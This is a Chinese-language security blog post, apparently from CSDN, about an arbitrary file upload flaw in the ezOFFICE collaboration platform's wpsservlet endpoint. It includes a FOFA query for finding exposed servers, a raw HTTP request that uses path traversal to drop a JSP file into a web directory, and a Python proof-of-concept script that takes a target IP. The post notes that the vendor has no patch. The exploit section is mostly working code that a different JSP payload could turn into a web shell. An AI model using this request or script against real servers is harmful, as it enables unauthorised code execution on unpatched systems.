万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台,平台ezoffice wpsservlet接口存在任意文件上传漏洞。

二、fofa语法

app="万户网络-ezOFFICE"

三、漏洞复现

poc

html 复制代码
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cache-Control: max-age=0
Content-Length: 176
Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb

--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"

<% out.print("797276100");%>
--55aeb894de1521afe560c924fad7c6fb--

拼接上传地址:http://xxxxxx/defaultroot/platform/portal/layout/40067.jsp

被拦截了

四、poc.py

python 复制代码
import requests

def verify(ip):

    url = f'{ip}/defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Cache - Control': 'max - age = 0',
        'Content - Length': '176',
        'Content-Type': 'multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb'
    }

    payload = '''
    --55aeb894de1521afe560c924fad7c6fb
    Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"
    
    <% out.print("success");%>
    --55aeb894de1521afe560c924fad7c6fb--
    '''

    try:
        response = requests.post(url, headers=headers, data=payload)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞!!!")
    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

五.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: http://www.whir.net

相关推荐
兢谨网安7 小时前
AI安全:从技术加固到体系化防御的实战演进
人工智能·安全·网络安全·渗透测试
xingxin329 小时前
PHP代码分析溯源(第3题)
安全·web安全·网络安全·php
LlNingyu9 小时前
文艺复兴,什么是CSRF,常见形式(一)
前端·安全·web安全·csrf
零零信安10 小时前
2026年03月29日 勒索软件监测日报 | 零零信安暗网威胁情报
网络安全·勒索软件·数据泄露·暗网·零零信安
谪星·阿凯11 小时前
RCE漏洞:从溯源解析到实战防御的完整指南
网络安全
m0_7381207212 小时前
我的创作纪念日0328
java·网络·windows·python·web安全·php
百度智能云技术站13 小时前
ClawHub 漏洞警示:官方商店失守,百度智能云守护小龙虾 Skill 供应链安全
网络·安全·web安全
unable code13 小时前
[NISACTF 2022]easyssrf
网络安全·web·ctf·1024程序员节
程序员小崔日记14 小时前
一篇文章带你入门漏洞靶场:从 0 到 1 玩转 bWAPP(附完整安装教程)
xml·网络安全·漏洞学习·靶场搭建
李彦亮老师(本人)14 小时前
网络安全基础:TCP/IP 协议栈安全分析与防护
tcp/ip·安全·web安全